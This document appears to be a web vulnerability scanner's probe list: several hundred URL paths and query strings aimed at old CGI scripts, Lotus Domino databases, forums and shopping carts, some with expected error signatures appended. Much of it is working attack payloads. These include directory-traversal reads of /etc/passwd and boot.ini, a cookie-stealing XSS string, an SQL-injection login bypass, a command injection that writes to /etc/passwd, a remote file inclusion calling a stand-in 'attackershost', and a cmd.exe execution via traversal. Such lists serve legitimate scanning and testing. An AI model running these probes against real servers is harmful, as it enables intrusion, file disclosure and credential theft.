cgi-bin/wwwthreads/3tvars.pm
cgi-bin/wwwthreads/w3tvars.pm
cgi-bin/zsh
adsamples/config/site.csc
advworks/equipment/catalog_type.asp
carbo.dll
clocktower/
localstart.asp
market/
mspress30/
sam
sam.bin
sam._
samples/search/queryhit.htm
scripts/counter.exe
scripts/cphost.dll
scripts/fpadmcgi.exe
scripts/postinfo.asp
scripts/samples/ctguestb.idc
scripts/samples/search/webhits.exe
site/iissamples/
vc30/
_mem_bin/
_mem_bin/FormsLogin.asp
perl/files.pl
perl5/files.pl
scripts/convert.bas
owa_util%2esignature
cgi-dos/args.bat
custdata/
hostingcontroller/
data.sql
databases/
databse.sql
db.sql
etc/passwd
img-sys/
java-sys/
javadoc/
log/
manager/
manual/
exchange/
pls/admin
account.nsf
accounts.nsf
admin.nsf
admin4.nsf
admin5.nsf
agentrunner.nsf
alog.nsf
archive/a_domlog.nsf
archive/l_domlog.nsf
a_domlog.nsf
billing.nsf
bookmark.nsf
books.nsf
busytime.nsf
calendar.nsf
certa.nsf
certlog.nsf
certsrv.nsf
chatlog.nsf
clbusy.nsf
cldbdir.nsf
clusta4.nsf
collect4.nsf
cpa.nsf
customerdata.nsf
da.nsf
database.nsf
db.nsf
dclf.nsf
DEASAppDesign.nsf
DEASLog.nsf
DEASLog01.nsf
DEASLog02.nsf
DEASLog03.nsf
DEASLog04.nsf
DEASLog05.nsf
decsadm.nsf
decsdoc.nsf
decslog.nsf
DEESAdmin.nsf
default.nsf
dirassist.nsf
doladmin.nsf
dols_help.nsf
domadmin.nsf
domcfg.nsf
event.nsf
events.nsf
events5.nsf
group.nsf
groups.nsf
help5_admin.nsf
help5_client.nsf
help5_designer.nsf
homepage.nsf
iNotes/Forms5.nsf
iNotes/Forms5.nsf/$DefaultNav
jotter.nsf
kbccv11.nsf
kbnv11.nsf
kbssvv11.nsf
lcon.nsf
ldap.nsf
leiadm.nsf
leilog.nsf
leivlt.nsf
log4a.nsf
lsxlc.nsf
l_domlog.nsf
mab.nsf
mail/adminisist.nsf
mail1.box
mail10.box
mail2.box
mail3.box
mail4.box
mail5.box
mail6.box
mail7.box
mail8.box
mail9.box
mailw46.nsf
msdwda.nsf
mtatbls.nsf
mtdata/mtstore.nsf
mtstore.nsf
nntp/nd000000.nsf
nntp/nd000001.nsf
nntp/nd000002.nsf
nntp/nd000003.nsf
nntp/nd000004.nsf
nntppost.nsf
notes.nsf
ntsync4.nsf
ntsync45.nsf
perweb.nsf
private.nsf
public.nsf
qpadmin.nsf
quickplace/quickplace/main.nsf
quickstart/qstart50.nsf
quickstart/wwsample.nsf
readme.nsf
reports.nsf
sample/faqw46
sample/framew46
sample/pagesw46
sample/siregw46
sample/site1w4646
sample/site2w4646
sample/site3w4646
schema50.nsf
secret.nsf
setupweb.nsf
smbcfg.nsf
smconf.nsf
smency.nsf
smmsg.nsf
smquar.nsf
smsolar.nsf
smtime.nsf
smtp.box
smtp.nsf
smtpibwq.nsf
smtpobwq.nsf
smtptbls.nsf
smvlog.nsf
software.nsf
srvnam.htm
statmail.nsf
stauths.nsf
stautht.nsf
stconf.nsf
stconfig.nsf
stdnaset.nsf
stdomino.nsf
stlog.nsf
streg.nsf
stsrc.nsf
test.nsf
today.nsf
userreg.nsf
users.nsf
vpuserinfo.nsf
web.nsf
webuser.nsf
welcome.nsf
wksinst.nsf
finance.xls
finances.xls
abonnement.asp
acartpath/signin.asp?|-|0|404_Object_Not_Found
add_acl
admbrowse.php?down=1&amp;cur=%2Fetc%2F&amp;dest=passwd&amp;rid=1&amp;S=[someid]
admin/auth.php
admin/cfg/configscreen.inc.php+
admin/cfg/configsite.inc.php+
admin/cfg/configsql.inc.php+
admin/cfg/configtache.inc.php+
admin/cms/htmltags.php
admin/credit_card_info.php
admin/exec.php3
admin/index.php
admin/modules/cache.php+
admin/objects.inc.php4
admin/script.php
admin/settings.inc.php+
admin/templates/header.php
admin/upload.php
admin_t/include/aff_liste_langue.php
adv/gm001-mc/
aff_news.php
approval/ts_app.htm
archive.asp
archive_forum.asp
ashnews.php
auth.inc.php
b2-tools/gm-2-b2.php
bandwidth/index.cgi
basilix.php3
bigsam_guestbook.php?displayBegin=9999...9999
bin/common/user_update_passwd.pl
biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found
biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found
board/index.php
board/philboard_admin.asp+
boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found
bugtest+/+
caupo/admin/admin_workspace.php
ccbill/whereami.cgi
chat_dir/register.php
checkout_payment.php
communique.asp
community/forumdisplay.php
community/index.php?analized=anything
community/member.php
compte.php
config/html/cnf_gi.htm
convert-date.php
cp/rac/nsManager.cgi
CSNews.cgi
csPassword.cgi?command=remove%20
cutenews/comments.php
cutenews/search.php
cutenews/shownews.php
Data/settings.xml+
database/metacart.mdb+
db.php
dbabble
dcp/advertiser.php
defines.php
dltclnt.php
doc/admin/index.php
docs/NED
dotproject/modules/files/index_table.php
dotproject/modules/projects/addedit.php
dotproject/modules/projects/view.php
dotproject/modules/projects/vw_files.php
dotproject/modules/tasks/addedit.php
dotproject/modules/tasks/viewgantt.php
do_map
do_subscribe
email.php
emml_email_func.php
emumail.cgi?type=.%00
entete.php
enteteacceuil.php
etc/shadow+
eventcal2.php.php
ez2000/ezadmin.cgi
ez2000/ezboard.cgi
ez2000/ezman.cgi
faqman/index.php
filemanager/index.php3
filemgmt/brokenfile.php
filemgmt/singlefile.php
filemgmt/viewcat.php
filemgmt/visit.php
foro/YaBB.pl
forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd
forum-ra.asp?n=../../../../../../../../../etc/passwd
forum-ra.asp?n=../../../../../../../../../etc/passwd%00
forum-ra.asp?n=/../../../../../../../../../../../boot.ini
forum-ra.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum-ra.asp?n=/etc/passwd
forum-ra.asp?n=/etc/passwd%00
forum-ra.asp?n=c:\boot.ini
forum-ra_professionnel.asp?n=%60/etc/passwd%60
forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00
forum-ra_professionnel.asp?n=../../boot.ini
forum-ra_professionnel.asp?n=/....../boot.ini
forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum-ra_professionnel.asp?n=/../../../../../../etc/passwd
forum-ra_professionnel.asp?n=/../../../etc/passwd
forum-ra_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum-ra_professionnel.asp?n=/etc/passwd
forum-ra_professionnel.asp?n=/etc/passwd%00
forum-ra_professionnel.asp?n=c:\boot.ini
forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
forum/mainfile.php
forum/member.php
forum/newreply.php
forum/newthread.php
forum/viewtopic.php
forum1.asp?n=%60/etc/passwd%60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/....../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_cu
forum1.asp?n=/../../../../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=1753&amp;nn=%60/etc/passwd%60
forum1.asp?n=1753&amp;nn=....//....//....//....//....//....//....//etc.passwd
forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd
forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd%00
forum1.asp?n=1753&amp;nn=/....../boot.ini
forum1.asp?n=1753&amp;nn=/..../boot.ini
forum1.asp?n=1753&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum1.asp?n=1753&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum1.asp?n=1753&amp;nn=/etc/passwd
forum1.asp?n=1753&amp;nn=/etc/passwd%00
forum1.asp?n=1753&amp;nn=c:\boot.ini
forum1.asp?n=c:\boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=%60/etc/passwd%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requi
forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_curren
forum1_professionnel.asp?n=/....../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_recor
forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requeste
forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_rec
forum1_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_reco
forum1_professionnel.asp?n=/etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=/etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=....//....//....//....//....//....//....//etc.passwd&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd%00&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60/etc/passwd%60
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=....//....//....//....//....//....//....//etc.passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd%00
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd%00
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=c:\boot.ini
forum1_professionnel.asp?n=1771&amp;nn=c:\boot.ini&amp;page=1
forum1_professionnel.asp?n=c:\boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=268
forum_arc.asp?n=c:\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/.../.../.../.../.../.../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=100
forum_professionnel.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
functions.inc.php+
get_od_toc.pl
globals.php3
globals.pl
Gozila.cgi
helperfunction.php
homebet/homebet.dll?form=menu&amp;option=menu-signin
htmltonuke.php
idealbb/error.asp?|-|0|404_Object_Not_Found
iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found
imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
imprimer.asp?no=....//....//....//....//....//....//....//etc.passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/....../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/.../.../.../.../.../.../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=c:\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
include/customize.php
include/help.php
includes/footer.php3
includes/header.php3
index.php?base=test%20
index.php?IDAdmin=test
index.php?pymembs=admin
index.php?SqlQuery=test%20
index.php?tampon=test%20
index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20
infos/contact/index.asp
infos/faq/index.asp
infos/gen/index.asp
infos/services/index.asp
instaboard/index.cfm
intranet/browse.php
invitefriends.php3
ipchat.php
ixmail_netattach.php
jsptest.jsp+
kernel/class/delete.php
kernel/classes/ezrole.php
ldap.search.php3?ldap_serv=nonsense%20
livredor/index.php
login.php3?reason=chpass2%20
mail/include.html
mail/settings.html
mail/src/read_body.php
mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd
mambo/banners.php
manage/login.asp+
mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F
members/ID.pm
members/ID.xbb
mod.php
modif/delete.php
modif/ident.php
modif_infos.asp?n=%60/etc/passwd%60
modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd
modif_infos.asp?n=../../../../../../../../../etc/passwd%00
modif_infos.asp?n=/....../boot.ini
modif_infos.asp?n=/.../.../.../.../.../.../boot.ini
modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
modif_infos.asp?n=/../../../../../../../../../etc/passwd
modif_infos.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
modif_infos.asp?n=/etc/passwd
modif_infos.asp?n=/etc/passwd%00
modif_infos.asp?n=c:\boot.ini
modules/Downloads/voteinclude.php+
modules/Forums/attachment.php
modules/Search/index.php
modules/WebChat/in.php+
modules/WebChat/out.php
modules/WebChat/quit.php
modules/WebChat/users.php
modules/Your_Account/navbar.php+
moregroupware/modules/webmail2/inc/
msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found
myguestBk/add1.asp?|-|0|404_Object_Not_Found
myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found
myguestBk/admin/index.asp?|-|0|404_Object_Not_Found
netget?sid=Safety&amp;msg=2002&amp;file=Safety
newtopic.php
nphp/nphpd.php
OpenTopic
options.inc.php+
oscommerce/default.php
parse_xml.cgi
php/gaestebuch/admin/index.php
php/php4ts.dll
pks/lookup
pm/lib.inc.php
poppassd.php3+
produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found
productcart/database/EIPC.mdb
productcart/pc/Custva.asp?|-|0|404_Object_Not_Found
ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found
product_info.php
prometheus-all/index.php
proplus/admin/login.php+-d+\"action=insert\"+-d+\"username=test\"+-d+\"password=test\"
protected/
protected/secret.html+
protectedpage.php?uid=&#039;%20OR%20&#039;&#039;=&#039;&amp;pwd=&#039;%20OR%20&#039;&#039;=&#039;
protection.php
pt_config.inc
pvote/add.php?question=AmIgAy&amp;o1=yes&amp;o2=yeah&amp;o3=well..yeah&amp;o4=bad%20
pvote/del.php?pollorder=1%20
quikmail/nph-emumail.cgi?type=../%00
room/save_item.php
rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
screen.php
scripts/tradecli.dll
scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir
security/web_access.html
sendphoto.php
servers/link.cgi
setpasswd.cgi
shop/php_files/site.config.php+
shop/search.php
shop/show.php
shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20
Site/biztalkhttpreceive.dll
site_searcher.cgi
spelling.php3+
squirrelmail/src/read_body.php
staticpages/index.php
status.php3
supporter/index.php
supporter/tupdate.php
sw000.asp?|-|0|404_Object_Not_Found
syslog.htm?%20
technote/print.cgi
texis/websearch/phine
tinymsg.php
tmp_view.php?file=/etc/passwd
topic/entete.php
topsitesdir/edit.php
ttforum/index.php
tutos/file/file_new.php
tutos/file/file_select.php
typo3/typo3/dev/translations.php
uifc/MultFileUploadHandler.php+
url.jsp
useraction.php3
userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd
utils/sprc.asp+
vars.inc+
VBZooM/add-subject.php
wbboard/profile.php
wbboard/reply.php
webcalendar/login.php
webcalendar/view_m.php
webmail/lib/emailreader_execute_on_each_page.inc.php
webmail/src/read_body.php
web_app/WEB-INF/webapp.properties
XMBforum/buddy.php
XMBforum/member.php
x_stat_admin.php
yabbse/Reminder.php
yabbse/Sources/Packages.php
zentrack/index.php
_head.php
cgi-bin/adduser.cgi
cgi-bin/amadmin.pl
cgi-bin/anyboard.cgi
cgi-bin/AT-generate.cgi
cgi-bin/auctiondeluxe/auction.pl
cgi-bin/awl/auctionweaver.pl
cgi-bin/bb-ack.sh
cgi-bin/bb-histlog.sh
cgi-bin/bb-rep.sh
cgi-bin/bb-replog.sh
cgi-bin/bbs_forum.cgi
cgi-bin/build.cgi
cgi-bin/bulk/bulk.cgi
cgi-bin/cached_feed.cgi
cgi-bin/calender_admin.pl
cgi-bin/cartmanager.cgi
cgi-bin/cbmc/forums.cgi
cgi-bin/cgforum.cgi
cgi-bin/change-your-password.pl
cgi-bin/clickresponder.pl
cgi-bin/commandit.cgi
cgi-bin/counter-ord
cgi-bin/counterbanner
cgi-bin/counterbanner-ord
cgi-bin/counterfiglet-ord
cgi-bin/counterfiglet/nc/
cgi-bin/CSMailto.cgi
cgi-bin/CSMailto/CSMailto.cgi
cgi-bin/csNews.cgi
cgi-bin/csPassword.cgi
